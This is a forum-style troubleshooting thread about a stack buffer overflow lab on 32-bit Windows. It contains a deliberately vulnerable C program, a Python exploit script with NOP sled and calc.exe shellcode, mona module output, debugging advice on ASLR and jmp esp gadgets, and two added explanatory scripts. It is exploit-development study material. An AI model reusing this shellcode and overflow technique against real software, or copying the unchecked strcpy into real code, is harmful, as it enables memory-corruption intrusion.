Issues with stackoverflow bug

I am trying to exploit this exercise on Windows 10 64-bit, but the executable is 32-bit. I can actually exploit the program, but I want to redirect to calc.exe shellcode instead of letsprint; however, when I try to inject my own shellcode, it doesn't work.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Deliberately vulnerable: buffer holds 15 bytes, but strcpy() copies argv[1]
   with no length check, so a longer argument runs past the buffer and over
   the saved return address of this frame. */
int copytobuffer(char* input){
     char buffer[15];
     strcpy (buffer,input);
     return 0;
}

/* Never called by the program itself; the exercise's target for the
   overwritten return address. */
void letsprint()
{
    printf("Hey!! , you succeeded\n");
    exit(0);
}

int main (int argc, char *argv[])
{
    int local_variable = 1;
    copytobuffer(argv[1]);
    exit(0);
}

#!/usr/bin/python
# Python 2 script: plain "..." literals are byte strings here.
import sys, subprocess, struct

# 27 bytes of filler reach the saved return address.
junk = "A" * 27

# Only 3 bytes of the letsprint address (0x00401524 in an image based at
# 0x00400000). argv[1] is not NUL-terminated until its very end, so the byte
# that follows this (the first 0x90 of the sled) becomes the fourth byte of
# the value written into the return-address slot.
function = "\x24\x15\x40"

nops = "\x90" * 20

# calc.exe shellcode as posted; it contains no 0x00 bytes.
shellcode = ""
shellcode += "\x50\x53\x51\x52\x56\x57\x55\x89"
shellcode += "\xe5\x83\xec\x18\x31\xf6\x56\x6a"
shellcode += "\x63\x66\x68\x78\x65\x68\x57\x69"
shellcode += "\x6e\x45\x89\x65\xfc\x31\xf6\x64"
shellcode += "\x8b\x5e\x30\x8b\x5b\x0c\x8b\x5b"
shellcode += "\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10"
shellcode += "\x89\x5d\xf8\x31\xc0\x8b\x43\x3c"
shellcode += "\x01\xd8\x8b\x40\x78\x01\xd8\x8b"
shellcode += "\x48\x24\x01\xd9\x89\x4d\xf4\x8b"
shellcode += "\x78\x20\x01\xdf\x89\x7d\xf0\x8b"
shellcode += "\x50\x1c\x01\xda\x89\x55\xec\x8b"
shellcode += "\x58\x14\x31\xc0\x8b\x55\xf8\x8b"
shellcode += "\x7d\xf0\x8b\x75\xfc\x31\xc9\xfc"
shellcode += "\x8b\x3c\x87\x01\xd7\x66\x83\xc1"
shellcode += "\x08\xf3\xa6\x74\x0a\x40\x39\xd8"
shellcode += "\x72\xe5\x83\xc4\x26\xeb\x41\x8b"
shellcode += "\x4d\xf4\x89\xd3\x8b\x55\xec\x66"
shellcode += "\x8b\x04\x41\x8b\x04\x82\x01\xd8"
shellcode += "\x31\xd2\x52\x68\x2e\x65\x78\x65"
shellcode += "\x68\x63\x61\x6c\x63\x68\x6d\x33"
shellcode += "\x32\x5c\x68\x79\x73\x74\x65\x68"
shellcode += "\x77\x73\x5c\x53\x68\x69\x6e\x64"
shellcode += "\x6f\x68\x43\x3a\x5c\x57\x89\xe6"
shellcode += "\x6a\x0a\x56\xff\xd0\x83\xc4\x46"
shellcode += "\x5d\x5f\x5e\x5a\x59\x5b\x58\xc3"

# Layout: filler | return address | NOP sled | shellcode
payload = junk + function + nops + shellcode

subprocess.call(['traditional_stack.exe', payload])
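Added example, not code from the original post: a Python 3 script that builds the same junk / return address / NOP sled / shellcode layout as the script above and simulates what strcpy() actually copies, then reads back which four bytes end up in the saved return address. The offset of 27 and the letsprint address 0x00401524 are taken from the script; JMP_ESP_PLACEHOLDER and DUMMY_SHELLCODE are made-up stand-ins (a real jmp esp address has to come from mona or a debugger on the target).

```python
#!/usr/bin/env python3
"""Added example (Python 3): what strcpy() copies from a payload and which
4 bytes land in the saved return address. Not code from the post."""
import struct

# letsprint address implied by the post's script ("\x24\x15\x40" in an image
# based at 0x00400000).
LETSPRINT_ADDR = 0x00401524
# Hypothetical placeholder only: stands in for a jmp esp inside KERNELBASE
# whose encoding has no 0x00 byte. A real one comes from mona/a debugger on
# the target and moves with the module base.
JMP_ESP_PLACEHOLDER = 0x74a51234
# Constructed stand-in for shellcode (int3s); NUL-free, like the posted one.
DUMMY_SHELLCODE = b"\xcc" * 8
OFFSET = 27          # filler bytes up to the saved return address, as in the post
NOPS = b"\x90" * 20


def build_payload(ret_bytes, shellcode=DUMMY_SHELLCODE, offset=OFFSET):
    """Same layout as the post's script: filler, return address bytes, sled, shellcode."""
    return b"A" * offset + ret_bytes + NOPS + shellcode


def strcpy_copies(payload):
    """Bytes strcpy() writes before its own terminating NUL: everything up to
    the first 0x00 in the source. argv[1] itself only ends at the last byte."""
    return payload.split(b"\x00", 1)[0]


def eip_after_copy(copied, offset=OFFSET):
    """Value left in the saved return address after the copy, or None if the
    copy did not reach it. The terminator strcpy() writes counts as one byte."""
    slot = (copied + b"\x00")[offset:offset + 4]
    if len(slot) < 4:
        return None
    return struct.unpack("<I", slot)[0]


def analyse(ret_bytes, shellcode=DUMMY_SHELLCODE):
    """Returns (eip_value, shellcode_reaches_stack) for one return-address encoding."""
    copied = strcpy_copies(build_payload(ret_bytes, shellcode))
    return eip_after_copy(copied), copied.endswith(shellcode)


if __name__ == "__main__":
    cases = {
        "3-byte letsprint as in the post": b"\x24\x15\x40",
        "4-byte letsprint (struct.pack)": struct.pack("<I", LETSPRINT_ADDR),
        "jmp esp placeholder (no NUL)": struct.pack("<I", JMP_ESP_PLACEHOLDER),
    }
    for label, ret in cases.items():
        eip, ok = analyse(ret)
        shown = "None" if eip is None else "%#010x" % eip
        print("%-32s EIP=%s  shellcode on stack: %s" % (label, shown, ok))
```

The three cases show the trade-off behind the thread: the 3-byte encoding keeps the sled and shellcode on the stack but the first 0x90 of the sled becomes the high byte of EIP (0x90401524); the full 4-byte letsprint address sets EIP correctly but contains 0x00, so strcpy() stops right after it and nothing of the sled or shellcode is copied; an address in a module loaded above 0x01000000 avoids the NUL, which is why a jmp esp from a DLL is needed, and why that DLL's ASLR status then matters.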

Your shellcode is not very readable. Do you have mitigations enabled? Where is calc running/stored? We need more information about your environment.

How did you compile this? Using which compiler? If gcc, with which flags? If MSVC++, are you using default flags?

It was compiled like this:
gcc.exe -m32 file.c -o file.exe
but I also added -fno-stack-protector; it doesn't work either.

Have you tried to figure out why it doesn’t work? Where does it break?

I know I have control over EIP.

#!/usr/bin/python
# Python 2: writes the crash payload to a file instead of launching the target.
import sys, subprocess, struct

junk = "A" * 27
eip = "B" * 4      # lands in the saved return address -> EIP = 0x42424242
payload = junk + eip

#subprocess.call(['stack-overflow.exe', payload])

with open("a", "wb") as f:   # binary mode so the bytes are written unchanged
    f.write(payload)

If I change my EIP to letsprint it works, but if I change it to my jmp esp (kernelbase), the shellcode doesn't work.

Have you checked kernelbase with ASLR? Maybe that’s why it’s not working. Are you checking using a debugger? If so, are you starting the process with the debugger or are you attaching?

How can I compile this with the Visual C++ cl compiler?

gcc.exe -m32 -fno-stack-protector --no-pie -z stackexec "C:\Users\blackleitus\Documents\exploit develoment\Stack Based Overflows\stack-overflow.c" -o "C:\Users\blackleitus\Documents\exploit develoment\Stack Based Overflows\stack-overflow.exe"

As you said before, you can control eip so I don’t think your program has the issue. Try running your program and then attaching with a debugger (rather than starting the program with the debugger) and check when you jump to kernelbase that the address and instructions are correct.

0BADF00D   -----------------------------------------------------------------------------------------------------------------------------------------
0BADF00D    Module info :
0BADF00D   -----------------------------------------------------------------------------------------------------------------------------------------
0BADF00D    Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
0BADF00D   -----------------------------------------------------------------------------------------------------------------------------------------
0BADF00D    0x74a50000 | 0x74c34000 | 0x001e4000 | True   | True    | True  |  False   | True   | 10.0.17134.376 [KERNELBASE.dll] (C:\WINDOWS\System32\KERNELBASE.dll)
0BADF00D    0x77c50000 | 0x77de0000 | 0x00190000 | True   | True    | True  |  False   | True   | 10.0.17134.228 [ntdll.dll] (C:\WINDOWS\SYSTEM32\ntdll.dll)
0BADF00D    0x76460000 | 0x76540000 | 0x000e0000 | True   | True    | True  |  False   | True   | 10.0.17134.376 [KERNEL32.DLL] (C:\WINDOWS\System32\KERNEL32.DLL)
0BADF00D    0x00400000 | 0x0041b000 | 0x0001b000 | False  | True    | False |  False   | False  | -1.0- [stack-overflow.exe] (C:\Users\blackleitus\Documents\exploit develoment\Stack Based Overflows\stack-overflow.exe)

Here is how it looks. I think maybe I created the PoC in the wrong way. I can only jump to the function instead of popping a w00t.
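Added example, not from the original thread: it applies the check suggested in the replies above (is kernelbase subject to ASLR?) to the mona "Module info" table by parsing the module rows and reporting why each module is or is not a safe source for a hard-coded return address. The rows are copied from the post; the assessment rules (ASLR and Rebase flags, 0x00 bytes forced by the address range) are the standard ones, and nothing here searches for an actual jmp esp.

```python
#!/usr/bin/env python3
"""Added example: parse mona's module table and flag modules that are
unsuitable as a source of a hard-coded return address. Not code from the post."""
import re
import struct

# Constructed sample input: the module rows from the mona output in the post.
MONA_OUTPUT = r"""
0BADF00D    0x74a50000 | 0x74c34000 | 0x001e4000 | True   | True    | True  |  False   | True   | 10.0.17134.376 [KERNELBASE.dll] (C:\WINDOWS\System32\KERNELBASE.dll)
0BADF00D    0x77c50000 | 0x77de0000 | 0x00190000 | True   | True    | True  |  False   | True   | 10.0.17134.228 [ntdll.dll] (C:\WINDOWS\SYSTEM32\ntdll.dll)
0BADF00D    0x76460000 | 0x76540000 | 0x000e0000 | True   | True    | True  |  False   | True   | 10.0.17134.376 [KERNEL32.DLL] (C:\WINDOWS\System32\KERNEL32.DLL)
0BADF00D    0x00400000 | 0x0041b000 | 0x0001b000 | False  | True    | False |  False   | False  | -1.0- [stack-overflow.exe] (C:\Users\blackleitus\Documents\exploit develoment\Stack Based Overflows\stack-overflow.exe)
"""

# Columns: Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version [name] (path)
ROW = re.compile(
    r"0x([0-9a-fA-F]{8})\s*\|\s*0x([0-9a-fA-F]{8})\s*\|\s*0x([0-9a-fA-F]{8})"
    r"\s*\|\s*(True|False)\s*\|\s*(True|False)\s*\|\s*(True|False)"
    r"\s*\|\s*(True|False)\s*\|\s*(True|False)\s*\|[^\[]*\[([^\]]+)\]"
)


def parse_modules(text):
    """Turn the mona table into a list of dicts; header and separator lines are skipped."""
    mods = []
    for line in text.splitlines():
        m = ROW.search(line)
        if not m:
            continue
        base, top, size, rebase, safeseh, aslr, nx, osdll, name = m.groups()
        mods.append({
            "name": name,
            "base": int(base, 16), "top": int(top, 16), "size": int(size, 16),
            "rebase": rebase == "True", "safeseh": safeseh == "True",
            "aslr": aslr == "True", "nxcompat": nx == "True", "osdll": osdll == "True",
        })
    return mods


def has_nul_byte(addr):
    """True if the little-endian encoding of addr contains 0x00 (strcpy() stops there)."""
    return b"\x00" in struct.pack("<I", addr)


def all_addresses_contain_nul(base, top):
    """Below 0x01000000 the most significant byte of every address is 0x00."""
    return top <= 0x01000000


def assess(mod):
    """Reasons this module is a bad source for a hard-coded gadget address (empty = none found)."""
    problems = []
    if mod["aslr"]:
        problems.append("ASLR: Windows picks a new base for this image at every boot, "
                        "so an address taken from one debugger session is stale after a reboot")
    if mod["rebase"]:
        problems.append("Rebase: the loader may move the image if its preferred base is taken")
    if all_addresses_contain_nul(mod["base"], mod["top"]):
        problems.append("every address in this image contains a 0x00 byte, "
                        "which strcpy() will not copy past")
    return problems


def usable_for_hardcoded_gadget(mod):
    return not assess(mod)


if __name__ == "__main__":
    for mod in parse_modules(MONA_OUTPUT):
        print("%-20s base=%#010x ASLR=%-5s Rebase=%-5s" % (
            mod["name"], mod["base"], mod["aslr"], mod["rebase"]))
        for p in assess(mod):
            print("    - " + p)
```

On this table no module passes: the three system DLLs have ASLR and Rebase set, so a jmp esp found in one session will not be where the payload expects it after a reboot, and the exe itself is at a fixed 0x00400000 but every address in it carries a 0x00 high byte, which is fine for a bare return-address overwrite (letsprint) but cuts off anything that has to follow it in a strcpy()-copied payload.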

Does your exploit work under manual debugging?

It works, but the only thing I can achieve is letsprint instead of popping a calc.

Perhaps your shellcode is incorrect? Have you verified if that is working?

It works, because I used it on Windows 7 and it pops a calc.exe. I also used the Windows 10 pop-calc shellcode and it doesn't work. Maybe I created this sample in the wrong way.

Step through your shellcode in a debugger and find out where it goes wrong.
